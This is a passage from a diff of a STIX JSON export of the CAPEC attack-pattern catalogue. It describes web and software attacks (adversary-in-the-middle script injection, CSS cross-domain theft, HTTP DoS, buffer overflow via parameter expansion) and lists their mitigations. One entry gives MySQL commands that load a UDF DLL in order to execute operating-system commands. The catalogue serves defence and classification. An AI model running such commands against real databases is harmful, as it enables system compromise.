intercepts these responses, injects their own malicious Java Script into these responses, and forwards to the victim's browser. In the victim's browser, that Java Script executes under the restrictions of the site with sensitive functionality and can be used to continue to interact with the sensitive site. So an attacker can execute scripts within the victim's browser on any domains the attacker desires. The attacker is able to use this technique to steal cookies from the victim's browser for whatever site the attacker wants. This applies to both persistent cookies and HTTP only cookies (unlike traditional XSS attacks). An attacker is also able to use this technique to steal authentication credentials for sites that only encrypt the login form, but do not require a secure channel for the initial request to get to the page with the login form. Further the attacker is also able to steal any autocompletion information. This attack pattern can also be used to enable session fixation and cache poisoning attacks. Additional attacks can be enabled as well.\n ", + "x_capec_prerequisites": [ + "The victim and the attacker are both in an environment where an active adversary in the middle attack is possible (e.g., public WIFI hot spot)The victim visits at least one website that does not use TLS / SSL" + ], + "x_capec_skills_required": { + "Low": "Ability to intercept and modify requests / responses", + "Medium": "Solid understanding of the HTTP protocol" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Tunnel communications through a secure proxy", + "id": "course-of-action--d80b15df-ac31-4f96-a44b-854eae42d178", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-466-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ac76aec8-ae77-4b13-ae78-40f3c080cb27", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d80b15df-ac31-4f96-a44b-854eae42d178", + "spec_version": "2.1", + "target_ref": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Trust level separation for privileged / non privileged interactions (e.g., two different browsers, two different users, two different operating systems, two different virtual machines)", + "id": "course-of-action--b3cd2e0b-e09e-426b-b06b-018ee62ab500", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-466-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--27a38eca-f7d9-4b5e-b966-8e6d36a9dce2", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3cd2e0b-e09e-426b-b06b-018ee62ab500", + "spec_version": "2.1", + "target_ref": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker harvests identifying information about a victim via an active session that the victim's browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the \"remember me\" feature to keep their session with the social networking site active. An attacker induces a payload to execute in the victim's browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing).", + "external_references": [ + { + "external_id": "CAPEC-467", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/467.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Ronen, Cross Site Identification - or - How your social network might expose you when you least expect it, 2009--12---27", + "external_id": "REF-404", + "source_name": "reference_from_CAPEC", + "url": "http://blog.quaji.com/2009/12/out-of-context-information-disclosure.html" + } + ], + "id": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Site Identification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker may post a malicious posting that contains an image with an embedded link. The link actually requests identifying information from the social networking site. A victim who views the malicious posting in their browser will have sent identifying information to the attacker, as long as the victim had an active session with the social networking site." + ], + "x_capec_extended_description": "\n There are many other ways in which the attacker may get the payload to execute in the victim's browser mainly by finding a way to hide it in some reputable site that the victim visits. The attacker could also send the link to the victim in an e-mail and trick the victim into clicking on the link. This attack is basically a cross site request forgery attack with two main differences. First, there is no action that is performed on behalf of the user aside from harvesting information. So standard CSRF protection may not work in this situation. Second, what is important in this attack pattern is the nature of the data being harvested, which is identifying information that can be obtained and used in context. This real time harvesting of identifying information can be used as a prelude for launching real time targeted social engineering attacks on the victim.\n ", + "x_capec_prerequisites": [ + "The victim has an active session with the social networking site." + ], + "x_capec_skills_required": { + "High": "An attacker should be able to create a payload and deliver it to the victim's browser.", + "Medium": "An attacker needs to know how to interact with various social networking sites (e.g., via available APIs) to request information and how to send the harvested data back to the attacker." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Users should always explicitly log out from the social networking sites when done using them.", + "id": "course-of-action--af4647f0-e80a-49ba-a16d-3c064e63c678", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-467-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--57332d9a-c39c-4f6b-b1ce-569f45f621b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--af4647f0-e80a-49ba-a16d-3c064e63c678", + "spec_version": "2.1", + "target_ref": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Users should not open other tabs in the browser when using a social networking site.", + "id": "course-of-action--8127e61d-3ccd-4866-bd76-59c159eeeefe", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-467-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5bb90021-f385-4a44-b27b-cecb4dfc0580", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8127e61d-3ccd-4866-bd76-59c159eeeefe", + "spec_version": "2.1", + "target_ref": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim's browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser.", + "external_references": [ + { + "external_id": "CAPEC-468", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/468.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "external_id": "CWE-149", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/149.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-838", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/838.html" + }, + { + "description": "Chris Evans, Generic cross-browser cross-domain theft, 2009--12---28", + "external_id": "REF-405", + "source_name": "reference_from_CAPEC", + "url": "http://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html" + } + ], + "id": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Generic Cross-Browser Cross-Domain Theft", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n By having control of some text in the victim's domain, the attacker is able to inject a seemingly valid CSS string. It does not matter if this CSS string is preceded by other data. The CSS parser will still locate the CSS string. If the attacker is able to control two injection points, one before the cross domain data that the attacker is interested in receiving and the other one after, the attacker can use this attack to steal all of the data in between these two CSS injection points when referencing the injected CSS while performing rendering on the site that the attacker controls. When rendering, the CSS parser will detect the valid CSS string to parse and ignore the data that \"does not make sense\". That data will simply be rendered. That data is in fact the data that the attacker just stole cross domain. The stolen data may contain sensitive information, such CSRF protection tokens.\n ", + "x_capec_prerequisites": [ + "No new lines can be present in the injected CSS stringProper HTML or URL escaping of the \" and ' characters is not presentThe attacker has control of two injection points: pre-string and post-string" + ], + "x_capec_resources_required": [ + "Attacker controlled site/page to render a page referencing the injected CSS string" + ], + "x_capec_skills_required": { + "High": "Ability to craft a CSS injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Prior to performing CSS parsing, require the CSS to start with well-formed CSS when it is a cross-domain load and the MIME type is broken. This is a browser level fix.", + "id": "course-of-action--ab470916-70bc-4ac8-8e6f-b924a0e868d5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-468-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2069c887-d975-4ee0-993c-8379a0d1af96", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab470916-70bc-4ac8-8e6f-b924a0e868d5", + "spec_version": "2.1", + "target_ref": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform proper HTML encoding and URL escaping", + "id": "course-of-action--3b11fd1d-aa44-4c8f-a3ae-438fa37413a5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-468-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b11fd1d-aa44-4c8f-a3ae-438fa37413a5", + "spec_version": "2.1", + "target_ref": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker performs flooding at the HTTP level to bring down only a particular web application rather than anything listening on a TCP/IP connection. This denial of service attack requires substantially fewer packets to be sent which makes DoS harder to detect. This is an equivalent of SYN flood in HTTP. The idea is to keep the HTTP session alive indefinitely and then repeat that hundreds of times. This attack targets resource depletion weaknesses in web server software. The web server will wait to attacker's responses on the initiated HTTP sessions while the connection threads are being exhausted.", + "external_references": [ + { + "external_id": "CAPEC-469", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/469.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-772", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/772.html" + }, + { + "description": "Endpoint Denial of Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "Robert Hansen, Slowris HTTP DoS, 2009--06---17", + "external_id": "REF-406", + "source_name": "reference_from_CAPEC", + "url": "http://ha.ckers.org/blog/20090617/slowloris-http-dos/" + } + ], + "id": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP DoS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "HTTP protocol is usedWeb server used is vulnerable to denial of service via HTTP flooding" + ], + "x_capec_resources_required": [ + "Ability to issues hundreds of HTTP requests" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Configure web server software to limit the waiting period on opened HTTP sessions", + "id": "course-of-action--cac35d87-f34b-428c-95aa-1e5963873af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-469-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dd88d686-216c-4942-8543-341f79451457", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cac35d87-f34b-428c-95aa-1e5963873af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use load balancing mechanisms", + "id": "course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-469-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--37641472-3448-4011-b562-97904650273a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220", + "spec_version": "2.1", + "target_ref": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack, the target software is given input that the adversary knows will be modified and expanded in size during processing. This attack relies on the target software failing to anticipate that the expanded data may exceed some internal limit, thereby creating a buffer overflow.", + "external_references": [ + { + "external_id": "CAPEC-47", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/47.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-130", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/130.html" + }, + { + "external_id": "CWE-131", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Buffer Overflow via Parameter Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: FTP glob()\n The glob() function in FTP servers has been susceptible to attack as a result of incorrect resizing. This is an ftpd glob() Expansion LIST Heap Overflow Vulnerability. ftp daemon contains a heap-based buffer overflow condition. The overflow occurs when the LIST command is issued with an argument that expands into an oversized string after being processed by glob().\n This buffer overflow occurs in memory that is dynamically allocated. It may be possible for adversaries to exploit this vulnerability and execute arbitrary code on the affected host.\n To exploit this, the adversary must be able to create directories on the target host.\n The glob() function is used to expand short-hand notation into complete file names. By sending to the FTP server a request containing a tilde (~) and other wildcard characters in the pathname string, a remote adversary can overflow a buffer and execute arbitrary code on the FTP server to gain root privileges. Once the request is processed, the glob() function expands the user input, which could exceed the expected length. In order to exploit this vulnerability, the adversary must be able to create directories on the FTP server.\n [REF-1]See also: CVE-2001-0249", + "\n Buffer overflow in the glob implementation in libc in NetBSD-current before 20050914, and NetBSD 2.* and 3.* before 20061203, as used by the FTP daemon, allows remote authenticated users to execute arbitrary code via a long pathname that results from path expansion.\n The limit computation of an internal buffer was done incorrectly. The size of the buffer in byte was used as element count, even though the elements of the buffer are 2 bytes long. Long expanded path names would therefore overflow the buffer.See also: CVE-2006-6652" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    In this attack, the normal method of providing large user input does not work. The program performs bounds checking on the user input, but not the expanded user input. The adversary needs to provide input that they believe will be expanded by the program to overflow a buffer. To identify where this is possible, an adversary either needs to have knowledge of the inner workings of the program or use a disassembler and other reverse engineering tools to guide the search.

  2. Craft overflow content: The adversary crafts the input to be given to the program. If the intent is to simply cause the software to crash, the input needs only to expand to an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft input that expands in a way that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

    3. Techniques
    Create specific files and directories on the system and then give input using path traversal shortcuts to those directories that could expand past an input buffer.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary gives the crafted input to the program, overflowing the buffer.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The program expands one of the parameters passed to a function with input controlled by the user, but a later function making use of the expanded parameter erroneously considers the original, not the expanded size of the parameter.", + "The expanded parameter is used in the context where buffer overflow may become possible due to the incorrect understanding of the parameter size (i.e. thinking that it is smaller than it really is)." + ], + "x_capec_resources_required": [ + "Access to the program source or binary. If the program is only available in binary then a disassembler and other reverse engineering tools will be helpful." + ], + "x_capec_skills_required": { + "High": "Finding this particular buffer overflow may not be trivial. Also, stack and especially heap based buffer overflows require a lot of knowledge if the intended goal is arbitrary code execution. Not only that the adversary needs to write the shell code to accomplish their goals, but the adversary also needs to find a way to get the program execution to jump to the planted shell code. There also needs to be sufficient room for the payload. So not every buffer overflow will be exploitable, even by a skilled adversary." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that when parameter expansion happens in the code that the assumptions used to determine the resulting size of the parameter are accurate and that the new size of the parameter is visible to the whole system", + "id": "course-of-action--f3dcafa1-68b1-4610-a489-f68adb1fcaed", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-47-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f17b6dc5-ba75-4137-8d20-e847c4934580", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3dcafa1-68b1-4610-a489-f68adb1fcaed", + "spec_version": "2.1", + "target_ref": "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.", + "external_references": [ + { + "external_id": "CAPEC-470", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/470.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "description": "Bernardo Damele Assump ção Guimarães, Advanced SQL Injection to Operating System Full Control, 2009--04---10", + "external_id": "REF-408", + "source_name": "reference_from_CAPEC", + "url": "http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf" + } + ], + "id": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Expanding Control over the Operating System from the Database", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The adversary identifies a database management system running on a machine they would like to gain control over, or on a network they want to move laterally through.

Experiment

  1. The adversary goes about the typical steps of an SQL injection and determines if an injection is possible.

  2. Once the Adversary determines that an SQL injection is possible, they must ensure that the requirements for the attack are met. These are a high privileged session user and batched query support. This is done in similar ways to discovering if an SQL injection is possible.

  3. If the requirements are met, based on the database management system that is running, the adversary will find or create user defined functions (UDFs) that can be loaded as DLLs. An example of a DLL can be found at https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql

  4. In order to load the DLL, the adversary must first find the path to the plugin directory. The command to achieve this is different based on the type of DBMS, but for MySQL, this can be achieved by running the command \"select @@plugin_dir\"

Exploit

  1. The DLL is then moved into the previously found plugin directory so that the contained functions can be loaded. This can be done in a number of ways; loading from a network share, writing the entire hex encoded string to a file in the plugin directory, or loading the DLL into a table and then into a file. An example using MySQL to load the hex string is as follows. select 0x4d5a9000... into dump file \"{plugin directory}\\\\udf.dll\";

  2. Once the DLL is in the plugin directory, a command is then run to load the UDFs. An example of this in MySQL is \"create function sys_eval returns string soname 'udf.dll';\" The function sys_eval is specific to the example DLL listed above.

  3. Once the adversary has loaded the desired function(s), they will use these to execute arbitrary commands on the compromised system. This is done through a simple select command to the loaded UDF. For example: \"select sys_eval('dir');\". Because the prerequisite to this attack is that the database session user is a super user, this means that the adversary will be able to execute commands with elevated privileges.

", + "x_capec_prerequisites": [ + "A vulnerable DBMS is usedA SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means" + ], + "x_capec_skills_required": { + "High": "Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Follow the defensive programming practices needed to protect an application accessing the database from SQL injection", + "id": "course-of-action--95d0b674-30ae-40e9-8db2-38a8a211eb62", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9147a7dc-96c2-41f7-b9c5-b3ef49dcdf38", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95d0b674-30ae-40e9-8db2-38a8a211eb62", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Ensure that the DBMS is patched with the latest security patches", + "id": "course-of-action--57dfed23-ac96-435d-9b02-e9c712b0bb48", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" 